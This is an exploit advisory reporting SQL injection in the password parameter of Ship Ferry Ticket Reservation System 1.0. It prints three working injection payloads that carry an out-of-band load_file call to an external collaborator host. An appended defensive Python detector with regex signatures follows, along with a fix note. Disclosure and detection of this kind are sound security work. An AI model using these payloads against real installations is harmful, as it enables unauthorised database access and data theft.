Ship Ferry Ticket Reservation System 1.0 SQL Injection
Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
## Titles: SFTRS - PHP (by: oretnom23) v1.0 Multiple-SQLi
### Bonus: FU + RCE & XSS - Information disclosure
## Author: nu11secur1ty
## Date: 09/14/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks.
The payload `'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'` was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can retrieve all the information in this system's database and take highly malicious action against the owner of this application!

STATUS: HIGH- Vulnerability for deprecation!
WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!
https://github.com/oretnom23

[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT 9033=9033 AND ('ehPW'='ehPW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw
---
```

## Reproduce:
[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)

## Time spent:
00:17:00
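A defender-side triage check for the technique classes this advisory reports against the login form (out-of-band `load_file` with a UNC path, boolean-based, error-based FLOOR/RAND, and time-based SLEEP). This is an added example, not code from the advisory or the vendor; the signature names, the `classify_form_body` function and the sample request bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlencode

# One signature per technique class named in the advisory (labels are assumptions).
SIGNATURES = {
    "oob-load_file-unc": re.compile(r"load_file\s*\(\s*['\"]\\\\", re.I),
    "boolean-tautology": re.compile(r"\b(?:or|and)\s+(?:not\s+)?(\d+)\s*=\s*\1\b", re.I),
    "error-based-floor-rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    "time-based-sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
}

def classify_form_body(body):
    """Decode an application/x-www-form-urlencoded body and return
    {parameter: [matched technique labels]} for every suspicious field."""
    findings = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        hits = [label for label, rx in SIGNATURES.items() if rx.search(value)]
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings

def form(password):
    # Build a login POST body the way a browser would encode it.
    return urlencode({"username": "alice", "password": password})

# Constructed sample bodies; the host name is a placeholder, not an indicator.
SAMPLES = {
    "benign": form("sleep well (7 hours) or not"),
    "oob": form(r"x'+(select load_file('\\\\oob.example.invalid\\probe'))+'"),
    "combined": form(r"x'+(select load_file('\\\\oob.example.invalid\\probe'))+'')"
                     " OR NOT 1=1 AND ('a'='a"),
    "error": form("x') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x41,"
                  "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"
                  " AND ('a'='a"),
    "time": form("x') AND (SELECT 1 FROM (SELECT(SLEEP(7)))t) AND ('a'='a"),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, classify_form_body(body))
```

Matches are a triage signal for request logs or inline inspection, not a fix: the flaw itself is closed by binding `password` as a parameter in a prepared statement, and MySQL's `secure_file_priv` setting restricts which files `load_file` may read.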